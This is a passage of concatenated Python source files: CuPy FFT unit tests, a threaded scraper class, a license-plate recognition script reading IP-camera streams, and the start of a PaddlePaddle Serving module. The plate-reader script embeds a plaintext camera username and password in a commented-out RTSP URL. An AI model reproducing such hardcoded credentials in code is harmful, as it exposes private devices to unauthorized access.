{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1), 'norm': None},
)
@testing.gpu
class TestFftnContiguity(unittest.TestCase):
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfft(self, xp, dtype):
# the scaling in old NumPy (< 1.13.0) is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.n is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft2(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype):
# the scaling in old NumPy (< 1.13.0) is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.s is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfftn(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype):
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
raise unittest.SkipTest('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestHfft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftfreq(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftshift(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading(unittest.TestCase):
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
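# A minimal sketch (not part of the test suite) of the plan context-manager pattern
# exercised by the TestPlanCtxManager* classes above: a cuFFT plan obtained from
# cupyx.scipy.fftpack.get_fft_plan is installed with `with plan:` so the enclosed
# cupy.fft call reuses it instead of creating a new plan.
def _plan_context_example():
    from cupyx.scipy.fftpack import get_fft_plan
    a = cupy.random.random((8, 8)).astype(cupy.complex64)
    plan = get_fft_plan(a, axes=(0, 1))
    with plan:
        return cupy.fft.fftn(a, axes=(0, 1))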
|
process.py
|
import os
import queue
import threading
from utils.scraper import Scraper
class Process(Scraper):
def __init__(self, site, base_dir, parse_count=10, threads=1):
self._base_dir = base_dir
self._progress_file = self._base_dir + "/progress"
self.log_file = self._base_dir + "/logs"
self._url_header = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
self._last_id = 0
self._max_id = 0
self._parse_count = parse_count
self._threads = threads
self._q = queue.Queue()
super().__init__(self.log_file)
self.site = site(self._base_dir, self._url_header, self.log_file)
def start(self):
self._max_id = self.site.get_latest()
start_val = 1
# Get start value from the progress file if it exists
if os.path.isfile(self._progress_file):
with open(self._progress_file, 'r') as outfile:
start_val = int(outfile.read())+1
print(self.log("##\tStarting at: " + str(start_val)))
# Find out where to stop
end_val = start_val + self._parse_count
if self._parse_count == 0 and self._max_id != 0:
end_val = self._max_id
for i in range(self._threads):
t = threading.Thread(target=self._thread_setup)
t.daemon = True
t.start()
for item_id in range(start_val, end_val):
self._q.put(item_id)
self._q.join()
self._done()
def _thread_setup(self):
while True:
num = self._q.get()
print(self.log("Processing: " + str(num)), end='\r')
try:
self.site.parse(num)
except Exception as e:
print(self.log("Exception [parse thread]: " + str(e)))
self.stop()
# Saving self._last_id here may cause some items to be re-parsed on the next run,
# because threads finish out of order and the last item processed is not necessarily the highest id
self._last_id = num
self._q.task_done()
def _done(self):
"""
Done parsing/downloading, clean up and save progress
:return:
"""
print("\n") # Since we are using `\r` above, we need to enter down when exiting the script
self.save_progress(self._progress_file, self._last_id)
def stop(self):
# threads finish in a non-deterministic order, so back off by the thread count and re-parse those items on the next start
self._last_id -= self._threads
self._done()
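# A minimal standalone sketch (not in the original module) of the queue-based worker
# pattern Process.start() relies on: daemon threads consume ids from a Queue, and
# q.join() blocks until every queued id has been marked done.
def _queue_worker_sketch(item_ids, work, num_threads=2):
    q = queue.Queue()
    def _worker():
        while True:
            item = q.get()
            try:
                work(item)  # e.g. site.parse(item) in the class above
            finally:
                q.task_done()
    for _ in range(num_threads):
        threading.Thread(target=_worker, daemon=True).start()
    for item in item_ids:
        q.put(item)
    q.join()  # returns once all queued items have been processed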
|
main_multiprocess.py
|
import csv
import sklearn
import imutils
import argparse
import cv2
import numpy as np
import Preprocess as pp
import os
import time
import datetime
import tensorflow as tf
import math
import Calibration as cal
import collections
import DetectChars
import DetectPlates
import PossiblePlate
import paho.mqtt.client as paho
import time
from imutils.video import WebcamVideoStream
from database import data,check
from queue import Queue
from threading import Thread
from utils.app_utils import FPS, WebcamVideoStream
# Module level variables for image ##########################################################################
SCALAR_BLACK = (0.0, 0.0, 0.0)
SCALAR_WHITE = (255.0, 255.0, 255.0)
SCALAR_YELLOW = (0.0, 255.0, 255.0)
SCALAR_GREEN = (0.0, 255.0, 0.0)
SCALAR_RED = (0.0, 0.0, 255.0)
VERIF = 2 # number for verification the plate license
# Main ##################################################################################################
def alpr(frame, sess, detection_graph):
# add knn library for detect chars
blnKNNTrainingSuccessful = DetectChars.loadKNNDataAndTrainKNN() # attempt KNN training
if blnKNNTrainingSuccessful == False: # if KNN training was not successful
print("\nerror: KNN traning was not successful\n") # show error message
return
count = 0
# initialize the license string buffer used for plate verification
license = []
VER = np.zeros(VERIF)
for x in VER:
license.append("")
numlicense = ""
knn = 0
loop=True
# resize the frame and convert it to grayscale
imgOriginalScene = imutils.resize(frame)
imgGrayscale, imgThresh = pp.preprocess(imgOriginalScene)
#cv2.imshow("threshold", imgThresh)
#imgOriginalScene = imutils.transform (imgOriginalScene)
imgOriginalScene, licenses = searching(imgOriginalScene,loop)
# only accept a plate after the same string has been read VERIF times in a row
license[count+1] = licenses
nums = license[VERIF-1]
if (license[count] == license[count+1]):
license[count]=license[count+1]
count = count + 1
elif (license[count] != license[count+1]):
coba = license[count+1]
count = 0
license[count] = coba
if count == (VERIF-1):
'''
plateAlloc = " "
numstring = ""
numbers = sum(c.isdigit() for c in nums)
words = sum(c.isalpha() for c in nums)
for c in nums:
numstring.append()
'''
global plat
plat = " "
plat = list(plat)
numstring = ""
numstring = list(numstring)
alphastring = ""
alphastring = list(alphastring)
numbers = sum(c.isdigit() for c in nums)
words = sum(c.isalpha() for c in nums)
for i in nums:
#nums = np.array(nums)
#nums = list(nums)
if i.isalpha():
#nums[i] = np.array(nums[i])
alphastring.append(i)
elif i.isdigit():
#nums[i] = np.array(nums[i])
numstring.append(i)
print(nums)
print(numstring)
print(alphastring)
#add numbers
a = 2
for b in numstring:
plat[a] = b
a+=1
#add front letter(s)
c = 0
sumfront = sum(c.isalpha() for c in nums[0:2])
if (sumfront == 1):
for d in nums[0:1]:
plat[c] = d
c+=1
elif (sumfront == 2):
for d in nums[0:2]:
plat[c] = d
c+=1
#add back letter(s)
e = -3
sumback = sum(e.isalpha() for e in nums[-3:])
if (sumback == 1):
for f in nums[-1:]:
plat[e] = f
e+=1
elif (sumback == 2):
for f in nums[-2:]:
plat[e] = f
e+=1
elif (sumback == 3):
for f in nums[-3:]:
plat[e] = f
e+=1
plat = ''.join(plat)
if (license[VERIF-1] == ""):
print("no characters were detected\n")
else:
#if number license same, not be saved
if (numlicense == license[VERIF-1]):
print("still = " + numlicense + "\n")
elif (len(nums) <= 9 and nums[0] >= 'A' and nums[0] <= 'Z' and numbers <= 4 and words <= 5):
numlicense = license[VERIF-1]
print("A new license plate read from image = " + plat + "\n")
insertdata= data(numlicense)
if check(numlicense):
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')
timestamp2 = datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S')
# Change this path to match your own machine
namefile = "/var/www/html/MonitoringDashboard/hasil_parksystem/"+ license[VERIF-1] + timestamp + timestamp2 + ".png"
cv2.imwrite(namefile, imgOriginalScene)
# Remove this section if you do not want to use the sensor or publish over MQTT
#broker="192.168.8.120"
#port=1883
#client1= paho.Client("control1") #create client object
#client1.connect(broker,port) #establish connection
#ret= client1.publish("xiaomi/to/write",'{"cmd": "write", "model": "plug", "sid": "158d0002365abb", "data": {"status": "on"}}')
# broker="192.168.1.151"
# port=1883
# client1= paho.Client("control1") #create client object
# client1.connect(broker,port) #establish connection
# client1.publish("alpr/mqtt","0")
# os.system('spd-say "Welcome to Graha Sumber Prima Elektronik"')
count = 0
cv2.putText(imgOriginalScene,"Press 's' to save frame to be 'save.png', for calibrating",(10,30),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1,bottomLeftOrigin = False)
cv2.rectangle(imgOriginalScene,((int(imgOriginalScene.shape[1]/2-230)),(int(imgOriginalScene.shape[0]/2-80))),((int(imgOriginalScene.shape[1]/2+230)),(int(imgOriginalScene.shape[0]/2+80))),SCALAR_GREEN,3)
try:
return dict(imgOriginalScenes=imgOriginalScene)
except:
return {}
def worker(input_q, output_q):
# Create a TensorFlow graph and session for this worker (a frozen detection model would be loaded into the graph here).
detection_graph = tf.Graph()
sess = tf.Session(graph=detection_graph)
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
#frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
#output_q.put(face_recog(frame_rgb, sess, detection_graph))
output_q.put(alpr(frame, sess, detection_graph))
fps.stop()
sess.close()
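# A minimal sketch (not in the original script) of the bounded-queue pipeline used in
# __main__: the capture loop feeds frames to the ALPR worker through a small input
# queue. In this hypothetical variant the producer drops frames when the worker is
# busy instead of blocking on put().
def _pipeline_sketch(read_frame, process_frame, maxsize=5):
    import queue as _stdqueue
    input_q = Queue(maxsize)
    output_q = Queue()
    def _worker():
        while True:
            output_q.put(process_frame(input_q.get()))
    Thread(target=_worker, daemon=True).start()
    while True:
        frame = read_frame()
        if frame is None:
            break
        try:
            input_q.put_nowait(frame)
        except _stdqueue.Full:
            pass  # worker is behind; drop this frame
        if not output_q.empty():
            output_q.get()  # hand processed results to the display loop here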
def drawRedRectangleAroundPlate(imgOriginalScene, licPlate):
p2fRectPoints = cv2.boxPoints(licPlate.rrLocationOfPlateInScene) # get 4 vertices of rotated rect
cv2.line(imgOriginalScene, tuple(p2fRectPoints[0]), tuple(p2fRectPoints[1]), SCALAR_RED, 2) # draw 4 red lines
cv2.line(imgOriginalScene, tuple(p2fRectPoints[1]), tuple(p2fRectPoints[2]), SCALAR_RED, 2)
cv2.line(imgOriginalScene, tuple(p2fRectPoints[2]), tuple(p2fRectPoints[3]), SCALAR_RED, 2)
cv2.line(imgOriginalScene, tuple(p2fRectPoints[3]), tuple(p2fRectPoints[0]), SCALAR_RED, 2)
# end function
###################################################################################################
def writeLicensePlateCharsOnImage(imgOriginalScene, licPlate):
ptCenterOfTextAreaX = 0 # this will be the center of the area the text will be written to
ptCenterOfTextAreaY = 0
ptLowerLeftTextOriginX = 0 # this will be the bottom left of the area that the text will be written to
ptLowerLeftTextOriginY = 0
sceneHeight, sceneWidth, sceneNumChannels = imgOriginalScene.shape
plateHeight, plateWidth, plateNumChannels = licPlate.imgPlate.shape
intFontFace = cv2.FONT_HERSHEY_SIMPLEX # choose a plain jane font
fltFontScale = float(plateHeight) / 30.0 # base font scale on height of plate area
intFontThickness = int(round(fltFontScale * 1.5)) # base font thickness on font scale
textSize, baseline = cv2.getTextSize(licPlate.strChars, intFontFace, fltFontScale, intFontThickness) # call getTextSize
# unpack rotated rect into center point, width and height, and angle
( (intPlateCenterX, intPlateCenterY), (intPlateWidth, intPlateHeight), fltCorrectionAngleInDeg ) = licPlate.rrLocationOfPlateInScene
intPlateCenterX = int(intPlateCenterX) # make sure center is an integer
intPlateCenterY = int(intPlateCenterY)
ptCenterOfTextAreaX = int(intPlateCenterX) # the horizontal location of the text area is the same as the plate
ptRegionX = int(intPlateCenterX)
if intPlateCenterY < (sceneHeight * 0.75): # if the license plate is in the upper 3/4 of the image
ptCenterOfTextAreaY = int(round(intPlateCenterY)) + int(round(plateHeight * 1.6)) # write the chars in below the plate
ptRegionY = ptCenterOfTextAreaY + int(round(plateHeight * 1.6))
else: # else if the license plate is in the lower 1/4 of the image
ptCenterOfTextAreaY = int(round(intPlateCenterY)) - int(round(plateHeight * 1.6)) # write the chars in above the plate
ptRegionY = ptCenterOfTextAreaY - int(round(plateHeight * 1.6))
# end if
textSizeWidth, textSizeHeight = textSize # unpack text size width and height
ptLowerLeftTextOriginX = int(ptCenterOfTextAreaX - (textSizeWidth / 2)) # calculate the lower left origin of the text area
ptLowerLeftTextOriginY = int(ptCenterOfTextAreaY + (textSizeHeight / 2)) # based on the text area center, width, and height
ptLowerLeftRegionX = int(ptRegionX - (textSizeWidth / 2)) # calculate the lower left origin of the text area
ptLowerLeftRegionY = int(ptRegionY + (textSizeHeight / 2))
# write the text on the image
cv2.putText(imgOriginalScene, licPlate.strChars, (ptLowerLeftTextOriginX, ptLowerLeftTextOriginY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
#cv2.putText(imgOriginalScene, plat, (ptLowerLeftTextOriginX, ptLowerLeftTextOriginY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
#cv2.putText(imgOriginalScene, plateRegion, (ptLowerLeftRegionX, ptLowerLeftRegionY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
# end function
# searching the plate license ##################################################################################################
def searching(imgOriginalScene,loop):
licenses = ""
if imgOriginalScene is None: # if image was not read successfully
print("error: image not read from file \n") # print error message to std out
os.system("pause") # pause so user can see error message
return
# end if
listOfPossiblePlates = DetectPlates.detectPlatesInScene(imgOriginalScene) # detect plates
#time.sleep(0.02)
listOfPossiblePlates = DetectChars.detectCharsInPlates(listOfPossiblePlates) # detect chars in plates
#time.sleep(0.05)
if (loop == False):
cv2.imshow("imgOriginalScene", imgOriginalScene)
if len(listOfPossiblePlates) == 0:
if (loop == False): # if no plates were found
print("no license plates were detected\n") # inform user no plates were found
else: # else
# if we get in here the list of possible plates has at least one plate
# sort the list of possible plates in DESCENDING order (most number of chars to least number of chars)
listOfPossiblePlates.sort(key = lambda possiblePlate: len(possiblePlate.strChars), reverse = True)
# suppose the plate with the most recognized chars (the first plate in sorted by string length descending order) is the actual plate
licPlate = listOfPossiblePlates[0]
if (loop == False):
cv2.imshow("imgPlate", licPlate.imgPlate) # show crop of plate and threshold of plate
cv2.imshow("imgThresh", licPlate.imgThresh)
if (len(licPlate.strChars) == 0): # if no chars were found in the plate
if (loop == False):
print("no characters were detected\n")
return # show message
# end if
drawRedRectangleAroundPlate(imgOriginalScene, licPlate)
writeLicensePlateCharsOnImage(imgOriginalScene, licPlate)
licenses = licPlate.strChars
if (loop == False):
print("license plate read from image = " + licenses + "\n") # write license plate text to std out
# write license plate text on the image
if (loop == False):
cv2.imshow("imgOriginalScene", imgOriginalScene) # re-show scene image
cv2.imwrite("imgOriginalScene.png", imgOriginalScene)
return imgOriginalScene, licenses
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=960, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=720, help='Height of the frames in the video stream.')
args = parser.parse_args()
input_q = Queue(5)  # a larger queue gives better FPS but adds more lag
output_q = Queue()
for i in range(1):
t = Thread(target=worker, args=(input_q, output_q))
t.daemon = True
t.start()
# video_capture = WebcamVideoStream(src='rtsp://admin:gspe12345@192.168.0.26:554/PSIA/streaming/channels/301',
# width=args.width,
# height=args.height).start()
video_capture = WebcamVideoStream(src='rtsp://192.168.0.10:554/user=admin&password=&channel=1&stream=0.sdp?',
width=args.width,
height=args.height).start()
fps = FPS().start()
while True:
frame = video_capture.read()
input_q.put(frame)
t = time.time()
if output_q.empty():
pass # fill up queue
# else:
# font = cv2.FONT_HERSHEY_SIMPLEX
# datakeluar = output_q.get()
# try:
# imgOriginalScenes = datakeluar['imgOriginalScenes']
# for (i,imgOriginalScene) in enumerate(imgOriginalScenes):
# cv2.putText(frame,"Press 's' to save frame to be 'save.png', for calibrating",(10,30),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1,bottomLeftOrigin = False)
#
# cv2.rectangle(frame,((int(imgOriginalScene.shape[1]/2-230)),(int(imgOriginalScene.shape[0]/2-80))),((int(imgOriginalScene.shape[1]/2+230)),(int(imgOriginalScene.shape[0]/2+80))),SCALAR_GREEN,3)
#
#
# except Exception as e:
# pass
cv2.imshow('imgOriginalScene', frame)
fps.update()
#print('[INFO] elapsed time: {:.2f}'.format(time.time() - t))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
video_capture.stop()
cv2.destroyAllWindows()
|
__init__.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import os
from .proto import server_configure_pb2 as server_sdk
from .proto import general_model_config_pb2 as m_config
import google.protobuf.text_format
import tarfile
import socket
import paddle_serving_server_gpu as paddle_serving_server
import time
from .version import serving_server_version
from contextlib import closing
import argparse
import collections
import fcntl
import shutil
import numpy as np
import grpc
from .proto import multi_lang_general_model_service_pb2
import sys
sys.path.append(
os.path.join(os.path.abspath(os.path.dirname(__file__)), 'proto'))
from .proto import multi_lang_general_model_service_pb2_grpc
from multiprocessing import Pool, Process
from concurrent import futures
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument(
"--thread", type=int, default=2, help="Concurrency of server")
parser.add_argument(
"--model", type=str, default="", help="Model for serving")
parser.add_argument(
"--port", type=int, default=9292, help="Port of the starting gpu")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--device", type=str, default="gpu", help="Type of device")
parser.add_argument("--gpu_ids", type=str, default="", help="gpu ids")
parser.add_argument(
"--name", type=str, default="None", help="Default service name")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_multilang",
default=False,
action="store_true",
help="Use Multi-language-service")
return parser.parse_args()
class OpMaker(object):
def __init__(self):
self.op_dict = {
"general_infer": "GeneralInferOp",
"general_reader": "GeneralReaderOp",
"general_response": "GeneralResponseOp",
"general_text_reader": "GeneralTextReaderOp",
"general_text_response": "GeneralTextResponseOp",
"general_single_kv": "GeneralSingleKVOp",
"general_dist_kv_infer": "GeneralDistKVInferOp",
"general_dist_kv": "GeneralDistKVOp"
}
self.node_name_suffix_ = collections.defaultdict(int)
def create(self, node_type, engine_name=None, inputs=[], outputs=[]):
if node_type not in self.op_dict:
raise Exception("Op type {} is not supported right now".format(
node_type))
node = server_sdk.DAGNode()
# node.name will be used as the infer engine name
if engine_name:
node.name = engine_name
else:
node.name = '{}_{}'.format(node_type,
self.node_name_suffix_[node_type])
self.node_name_suffix_[node_type] += 1
node.type = self.op_dict[node_type]
if inputs:
for dep_node_str in inputs:
dep_node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(dep_node_str, dep_node)
dep = server_sdk.DAGNodeDependency()
dep.name = dep_node.name
dep.mode = "RO"
node.dependencies.extend([dep])
# The return value is used as a dict key, and the proto object is
# mutable and therefore unhashable, so it is serialized to a string.
# This has little effect on overall efficiency.
return google.protobuf.text_format.MessageToString(node)
class OpSeqMaker(object):
def __init__(self):
self.workflow = server_sdk.Workflow()
self.workflow.name = "workflow1"
self.workflow.workflow_type = "Sequence"
def add_op(self, node_str):
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
if len(node.dependencies) > 1:
raise Exception(
'Set more than one predecessor for op in OpSeqMaker is not allowed.'
)
if len(self.workflow.nodes) >= 1:
if len(node.dependencies) == 0:
dep = server_sdk.DAGNodeDependency()
dep.name = self.workflow.nodes[-1].name
dep.mode = "RO"
node.dependencies.extend([dep])
elif len(node.dependencies) == 1:
if node.dependencies[0].name != self.workflow.nodes[-1].name:
raise Exception(
'Ops must be added in order in OpSeqMaker. The current op depends on {}, but the previous op is {}.'.
format(node.dependencies[0].name, self.workflow.nodes[
-1].name))
self.workflow.nodes.extend([node])
def get_op_sequence(self):
workflow_conf = server_sdk.WorkflowConf()
workflow_conf.workflows.extend([self.workflow])
return workflow_conf
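# A minimal sketch (not part of this module) of how OpMaker and OpSeqMaker are
# typically combined to build the standard reader -> infer -> response sequence
# that Server.set_op_sequence() expects.
def _build_default_op_sequence():
    op_maker = OpMaker()
    read_op = op_maker.create('general_reader')
    infer_op = op_maker.create('general_infer')
    response_op = op_maker.create('general_response')
    op_seq_maker = OpSeqMaker()
    op_seq_maker.add_op(read_op)
    op_seq_maker.add_op(infer_op)
    op_seq_maker.add_op(response_op)
    return op_seq_maker.get_op_sequence()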
class OpGraphMaker(object):
def __init__(self):
self.workflow = server_sdk.Workflow()
self.workflow.name = "workflow1"
# Currently, SDK only supports "Sequence"
self.workflow.workflow_type = "Sequence"
def add_op(self, node_str):
node = server_sdk.DAGNode()
